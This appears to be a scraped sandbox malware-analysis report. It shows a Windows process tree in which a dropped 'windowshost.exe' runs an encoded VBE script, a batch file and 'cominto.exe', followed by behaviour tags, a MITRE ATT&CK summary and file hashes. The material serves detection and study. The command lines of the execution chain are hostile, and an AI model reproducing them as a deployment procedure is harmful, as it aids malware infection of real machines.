C:\Windows\SysWOW64\cmd.execmd /c start C:\Users\Admin\AppData\Local\Temp\windowshost.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3412 -
C:\Users\Admin\AppData\Local\Temp\windowshost.exeC:\Users\Admin\AppData\Local\Temp\windowshost.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\driverPerf\DDCzSbk7D28EdFKaphOM.vbe"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\driverPerf\lG0LQTEIJKvWsYHAg5CgQ5boB.bat" "6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\driverPerf\cominto.exe"C:\driverPerf\cominto.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3588
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3776
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3944
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4116
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3760
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4888
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4456
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3524
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4240
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1560
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:4660
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4320
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2636
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4884
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Create or Modify System Process
2Windows Service
2Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
539B
MD58ee0f3b0e00f89f7523395bb72e9118b
SHA1bec3fa36a1fb136551dc8157a4963ba5d2f957d4
SHA2568c5f958972fce1812970a1f8da8ccef94a86663d42d13e296813673638a6b68b
SHA51255f862beb42fa76ca118b2c76c92cb1e0a2586727c602645d0d4bd0e8f2120cfc2015f4333df67f3bd9f4eda8b9b399774461ab558f08312920a1489acf7a207
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
Filesize
17KB
MD59fa4d34c8a16bbc037c59c0ff7114512
SHA1bd2fc804aa542f7c2305cfc15b49c1a0c9976aa4
SHA256ce5fa03584561a909f9748ee7b5a065bd2b2ac6c21456a301120138ce9e2ff84
SHA5127453c95529b1e2f18fc5c88a3ce1181fe69a7fac12408203e1420741a631b31626e55249f5b7dde35e3c0b6cc00a380d251cc6b4a95285e6b77d8c4f45ee7f44
-
Filesize
18KB
MD597f33fe495ac57606ffdb118bcec9bec
SHA16a1720500c0b5e2b24bcbc4892275832cc6dd6c7
SHA256e059c08bce508b0291a1874d2b76acab0135d8d91c3610a2e511cf0ecf66fc82
SHA5128fd29e536ad0a01af1c7ea3831c695a5c042b576c0d6b127d971a26f5c8ab543dd58b3f13d4695b9eaf435cea2368870d438596267c7b5c6f4e0647da3a6abd9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
95KB
MD519eab19c0d0a0b062c8eb85a94a79cc6
SHA13f0e2e88b9ff61e2e56edc473861cc4373af525a
SHA25602eb6c61b19d347b9b6846285991142bb0d7515401f8fc4cf7f961be72a3c215
SHA512550b2aa4b1892643f4a06d9df302f5685e9275ca9b302b8467fd35af806add36fe6ba6202488ea6209ee1b4a79f638d5f6e729bcf4a1b73fd38c4d4570b28223
-
Filesize
2.1MB
MD5fa0429acc4b9cfd414d24fae0e299790
SHA180d76038b5401080e18e6b015cbf806d9abe8589
SHA2561440a0bb2287c84bc89c40255413dc2cab070a4382b59e9cffaa3abfe7da5489
SHA512f6af06d7c505ab4d23a80fe616422302c5a87bfbefc81d6b0f4af36fcf86f30f865dcb4806581799a139f1b965c8d3b842125ac0b4c9a8ea59469601d9edff9e
-
Filesize
2.8MB
MD551ab765a1b1f884f936db4ffc642d728
SHA17b7741bf5dfeaed3860bf308733490017688fa46
SHA256816835537df73c3297cb1a0ddfe02d8f051f0fd9486ee2b1e53969b37fa87f14
SHA512e25fdd4a7f4fd8bfe9491ec8138ed08077c2c2cd63686e6e4a59859e27294cc35d0ff99ff0b29ae3c2901c6f99e970f6d8e80435d86811398fdb41cf1bbb5234
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
5KB
MD535193486f5924d10afef3959000292db
SHA1b785c32a128a083fcb3712c72c2b024cf6095685
SHA2567484fb0afbfc74bbe6a82f1e000fa6d87a68e986b5bd8e6d4115d1b07e72fd5f
SHA51286e05a7dde1a5e240adef82ce7acad86fd98793010b948c178c3b96ed376b992ca8c8f370b40f1c24a0241ef0c46a5e295aeb7481e1d4ae15fafca18703bfb7b
-
Filesize
5KB
MD58d2fa2b0a4f3a405d67216b3b609a62b
SHA1bbb6015d7d2949ff690fab69cab83c8d6ca322c3
SHA256a0889c0ac62ea5329298fb358bd40389824919dd588705fdba3f9d25296aa3b0
SHA512c689f2582b7d3fd3a95990461f1cb6b705359ab40709a54f6e1be338bf9ec832292df5701cfc4a9b951a17ba7ce8d62d4fb97baf342b8d603b10431d7c77d3a1
-
Filesize
3KB
MD590da204b95e863dc622c45cf157c5bf6
SHA1ce345b6a1834178a4db5ed785757d5c685aafc69
SHA25694b5cd9d7d639e6d610b1404282d6a81a2e13867bf2f1379d449d490deaaf61f
SHA512ce2735f4b888672761358c050256cc6239e25e225bd2443f0bdd59975f1a38267cf791419d567d194c2d767afb7edb9c28cc86e4a00371303b6f7377827bc949
-
Filesize
212B
MD576764afd7b394cd6a9c36fa16d4c88fc
SHA15274a18139edf134230252c97652bfa6319b1a78
SHA256e58f2652ec82227d6ecacc733adb6e9812fcb39283ef87aba2be65326851e50e
SHA5123018cbc23b59527b0fe54fc17f13735dddf2e91ac188afb7abdb6fc932e2a965d725b0ffaa8b03fcc7c9f4fbd9f1ba3aafde6a2e3fe1112ccbe42fca44be01ae
-
Filesize
2.5MB
MD54344aa160852993fab07ae5793321886
SHA1d33a04a9f58d6172bfaa611ceeb03b24b7c5bee5
SHA256bbbebdfec732e0805dc3865cfa2f546120e7300d8d6d98ba71ca85026375add4
SHA512557c569a182284d43db1342aaa64b61acae4665548fa2a7c63af05d45ae1058d070f536c6c80a859e54a051177d21cc21c86b3de4cb03d1d63c993495067d2c0
-
Filesize
27B
MD561b88edb5f6dca914ee05650653d8223
SHA14b61f3f21e8c981aaa73e375d090de82be46720d
SHA256eba6d05af3adbcc9a111fe968c3a2c725221f8f7896df3490bc2509bec01cf12
SHA5121eea3fe2ca12c0d9bc3f9a7a13a1438cdd25e35607232025477af885db7987f6cd4d03613e6be0f6c8457e9db3eaf9b394f62ed14dffa4fbb36c1c07d8e5e7b5